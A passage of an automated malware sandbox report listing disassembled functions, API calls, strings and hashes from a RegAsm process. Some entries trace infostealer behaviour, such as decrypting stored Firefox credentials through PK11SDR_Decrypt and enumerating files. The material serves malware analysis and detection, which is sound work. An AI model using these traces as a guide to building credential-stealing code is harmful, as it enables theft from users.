                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                        • String ID:
                                                                                                        • API String ID: 1510409361-0
                                                                                                        • Opcode ID: 55098718065b47f95675a7e436a93b6de4862d5c8eff2d4e028c5747bd21810a
                                                                                                        • Instruction ID: c06e2f330fc7036e1ff051fb35d667afe70516d7c4c951db7c8cb2e629012688
                                                                                                        • Opcode Fuzzy Hash: 55098718065b47f95675a7e436a93b6de4862d5c8eff2d4e028c5747bd21810a
                                                                                                        • Instruction Fuzzy Hash: ED71DFB1A006058FDB00CFA5CC85AABB7F1BF58318F24862DE919D7B12E771E954CB91
                                                                                                        Function 6C140FE0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 227COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C13CA30: EnterCriticalSection.KERNEL32(?,?,?,6C19F9C9,?,6C19F4DA,6C19F9C9,?,?,6C16369A), ref: 6C13CA7A
                                                                                                          • Part of subcall function 6C13CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C13CB26
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C14103E
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C141139
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C141190
                                                                                                        • sqlite3_free.NSS3(00000000), ref: 6C141227
                                                                                                        • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C14126E
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C14127F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
                                                                                                        • String ID: P,l$delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                                        • API String ID: 2733752649-126046869
                                                                                                        • Opcode ID: cd75f208dce0cdbadd28cef045152b83497f2d891976e8a3cac54f66e5841202
                                                                                                        • Instruction ID: 30191938127c3a0f8f67c6d8b1351d35f882c24aab1d02bdc45bb3f8048d72ce
                                                                                                        • Opcode Fuzzy Hash: cd75f208dce0cdbadd28cef045152b83497f2d891976e8a3cac54f66e5841202
                                                                                                        • Instruction Fuzzy Hash: 1E710672705305DFEB04DB35DC85AAA7379FB97764F24822EE815C7A80DB34D811C692
                                                                                                        Function 6C206C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C1B1C6F,00000000,00000004,?,?), ref: 6C206C3F
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C1B1C6F,00000000,00000004,?,?), ref: 6C206C60
                                                                                                        • PR_ExplodeTime.NSS3(00000000,6C1B1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C1B1C6F,00000000,00000004,?,?), ref: 6C206C94
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                        • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                        • API String ID: 3534712800-180463219
                                                                                                        • Opcode ID: d05898c43426aaf5af9e2fa787e132fa586d6a1333c79598dbab6b540b50fa55
                                                                                                        • Instruction ID: e737ffd1368eeb8fa2f453c6abcfafd67262c5188dd5dcac8ce54e4b0e529f10
                                                                                                        • Opcode Fuzzy Hash: d05898c43426aaf5af9e2fa787e132fa586d6a1333c79598dbab6b540b50fa55
                                                                                                        • Instruction Fuzzy Hash: FB515D72B016494FC70CCEADDC927DAB7DAABA4310F48C23AE842DB781D638D946C751
                                                                                                        Function 6C280F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C281027
                                                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C2810B2
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C281353
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$strlen
                                                                                                        • String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
                                                                                                        • API String ID: 2619041689-2155869073
                                                                                                        • Opcode ID: af92ca074c41cffc448dd6e1961b98ab9b62ab62719c831c9027e97b9bb4e4cb
                                                                                                        • Instruction ID: 1fc1279a55477da37772d090ae71df9c71177cdab8e24048d8446f223dedc3cf
                                                                                                        • Opcode Fuzzy Hash: af92ca074c41cffc448dd6e1961b98ab9b62ab62719c831c9027e97b9bb4e4cb
                                                                                                        • Instruction Fuzzy Hash: 02E1A071A093499FD704CF18C880AABBBF5AF85348F14891DFDA587B91D771E889CB42
                                                                                                        Function 0040A7D8 Relevance: 15.1, APIs: 10, Instructions: 94stringencryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 0040A815
                                                                                                        • lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A830
                                                                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040A838
                                                                                                        • PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A846
                                                                                                        • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A85A
                                                                                                        • PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A89A
                                                                                                        • _memmove.LIBCMT ref: 0040A8BB
                                                                                                        • lstrcatA.KERNEL32(00436803,00436807,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8E5
                                                                                                        • PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A8EC
                                                                                                        • lstrcatA.KERNEL32(00436803,0043680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalString_memmove_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 4058207798-0
                                                                                                        • Opcode ID: a697b237291ad732cff6152e98f2904289e14e348f3c7af2acd105475d3b2c95
                                                                                                        • Instruction ID: 7253553526a9c866879b9953ce513a4e0df9f59d016b35785d070f4f95aa81eb
                                                                                                        • Opcode Fuzzy Hash: a697b237291ad732cff6152e98f2904289e14e348f3c7af2acd105475d3b2c95
                                                                                                        • Instruction Fuzzy Hash: 60315CB2D0421AAFDB10DB64DD849FAB7BCAF08345F5040BAF409E2240E7794A859F66
                                                                                                        Function 0040CD37 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 298filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • wsprintfA.USER32 ref: 0040CD5C
                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0040CD73
                                                                                                        • StrCmpCA.SHLWAPI(?,004374EC), ref: 0040CD94
                                                                                                        • StrCmpCA.SHLWAPI(?,004374F0), ref: 0040CDAE
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • lstrlenA.KERNEL32(0040D3B5,00436872,004374F4,?,0043686F), ref: 0040CE41
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0040D23C
                                                                                                        • FindClose.KERNEL32(?), ref: 0040D250
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Filelstrcpy$Find$CloseCreatelstrcatlstrlen$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
                                                                                                        • String ID: %s\*.*
                                                                                                        • API String ID: 833390005-1013718255
                                                                                                        • Opcode ID: e3119fbe257bcb94e031ea0aba949192674802f0e8d62e16cea99c2e2a5aeac3
                                                                                                        • Instruction ID: 06796af3159d5870cfde4b437f7530c4b10063cc36196476c106a896cedecc2d
                                                                                                        • Opcode Fuzzy Hash: e3119fbe257bcb94e031ea0aba949192674802f0e8d62e16cea99c2e2a5aeac3
                                                                                                        • Instruction Fuzzy Hash: C6D1DA71A4112DABDF20FB25DD46ADD77B5AF44308F4100E6A908B3152DB78AFCA8F94
                                                                                                        Function 6C288FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C288FEE
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2890DC
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C289118
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C28915C
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2891C2
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C289209
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: 3333$UUUU
                                                                                                        • API String ID: 1967222509-2679824526
                                                                                                        • Opcode ID: 6e29bd764c42582b7baa989fcc547e362c3cd932d7b0a9e35e69937378dde2b0
                                                                                                        • Instruction ID: b319bb9951c6781b220dbc9adfa6851f85c3566ed07d89ddf852cc4c9f6d935f
                                                                                                        • Opcode Fuzzy Hash: 6e29bd764c42582b7baa989fcc547e362c3cd932d7b0a9e35e69937378dde2b0
                                                                                                        • Instruction Fuzzy Hash: 17A19F72E001199FDB04DB69CC81BDEB7B5BF48328F094129ED15A7781EB36AC15CBA1
                                                                                                        Function 6C2C8D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_CallOnce.NSS3(6C3114E4,6C27CC70), ref: 6C2C8D47
                                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C2C8D98
                                                                                                          • Part of subcall function 6C1A0F00: PR_GetPageSize.NSS3(6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F1B
                                                                                                          • Part of subcall function 6C1A0F00: PR_NewLogModule.NSS3(clock,6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F25
                                                                                                        • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C2C8E7B
                                                                                                        • htons.WSOCK32(?), ref: 6C2C8EDB
                                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C2C8F99
                                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C2C910A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                        • String ID: %u.%u.%u.%u
                                                                                                        • API String ID: 1845059423-1542503432
                                                                                                        • Opcode ID: 16dcb51c7b0c704920b9e42b3b29ebf8862ffba3005ccb044dc53a4c0d914289
                                                                                                        • Instruction ID: f3966d27fafc8dfaa147aed45b80910742d424ce23be33a0cc05c7685b81f453
                                                                                                        • Opcode Fuzzy Hash: 16dcb51c7b0c704920b9e42b3b29ebf8862ffba3005ccb044dc53a4c0d914289
                                                                                                        • Instruction Fuzzy Hash: 2002B931B0525A8FDB18CB1DC4697AABBA2EF42308F19C35AEC915BA91C371D905C7D2
                                                                                                        Function 6C0E2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C0E2C31
                                                                                                        • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C0E2C61
                                                                                                          • Part of subcall function 6C094DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C094E5A
                                                                                                          • Part of subcall function 6C094DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C094E97
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0E2C82
                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C0E2E2D
                                                                                                          • Part of subcall function 6C0A81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C0A81DE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                        • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                        • API String ID: 801438305-4149320968
                                                                                                        • Opcode ID: e657552ce858fc11b82705710fbd553fc8e70aec06383167abf50436b349e0ab
                                                                                                        • Instruction ID: 7a69e0bc1ad8d36359c6b83704eb54f836f50034368b2ddd2d37825e3ca809fe
                                                                                                        • Opcode Fuzzy Hash: e657552ce858fc11b82705710fbd553fc8e70aec06383167abf50436b349e0ab
                                                                                                        • Instruction Fuzzy Hash: 4C91DE706483818FC724CF24C48579EBBE0AFC9358F10892DE59A9BB61DB30E949CB43
                                                                                                        Function 6C2468E0 Relevance: 12.2, APIs: 8, Instructions: 241COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_GetIdentitiesLayer.NSS3 ref: 6C2468FC
                                                                                                        • PR_EnterMonitor.NSS3 ref: 6C246924
                                                                                                          • Part of subcall function 6C279090: TlsGetValue.KERNEL32 ref: 6C2790AB
                                                                                                          • Part of subcall function 6C279090: TlsGetValue.KERNEL32 ref: 6C2790C9
                                                                                                          • Part of subcall function 6C279090: EnterCriticalSection.KERNEL32 ref: 6C2790E5
                                                                                                          • Part of subcall function 6C279090: TlsGetValue.KERNEL32 ref: 6C279116
                                                                                                          • Part of subcall function 6C279090: LeaveCriticalSection.KERNEL32 ref: 6C27913F
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07AD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07CD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07D6
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C13204A), ref: 6C1A07E4
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,6C13204A), ref: 6C1A0864
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C1A0880
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,6C13204A), ref: 6C1A08CB
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08D7
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08FB
                                                                                                        • PR_EnterMonitor.NSS3 ref: 6C24693E
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C246977
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C2469B8
                                                                                                        • PR_ExitMonitor.NSS3 ref: 6C246B1E
                                                                                                        • PR_ExitMonitor.NSS3 ref: 6C246B39
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C246B62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
                                                                                                        • String ID:
                                                                                                        • API String ID: 4003455268-0
                                                                                                        • Opcode ID: 1dcbc5f4e124f1828d6813ff9525a56848807dc231ada6033e2ed1fec02296a4
                                                                                                        • Instruction ID: 6748bf6e9b8858629c595f2b55b4fc0dad8352274fa3171d7c52e9fa659288ca
